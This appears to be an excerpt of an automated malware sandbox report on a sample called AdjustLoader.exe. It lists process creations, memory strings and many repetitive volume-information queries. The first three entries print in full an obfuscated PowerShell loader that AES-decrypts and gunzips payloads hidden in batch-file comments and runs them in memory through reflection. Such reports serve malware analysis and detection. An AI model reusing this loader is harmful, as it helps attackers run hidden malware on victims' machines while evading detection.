Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\users\user\appdata\local\temp\tmp6432.tmp.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\windows\$nya-onimai3\$nya-loli.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\windows\$nya-onimai3\$nya-loli.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); "
Source: dwm.exe, 0000003B.00000000.2388466287.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 00000038.00000000.2381611181.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003B.00000000.2389293829.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000038.00000000.2381611181.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003B.00000000.2389293829.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: winlogon.exe, 00000038.00000000.2381611181.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003B.00000000.2389293829.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: winlogon.exe, 00000038.00000000.2381611181.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003B.00000000.2389293829.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Windows\System32\cmd.exe Code function: 1_3_00000208442E2A90 cpuid 1_3_00000208442E2A90
Source: C:\Users\user\Desktop\AdjustLoader.exe Queries volume information: C:\Users\user\Desktop\AdjustLoader.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
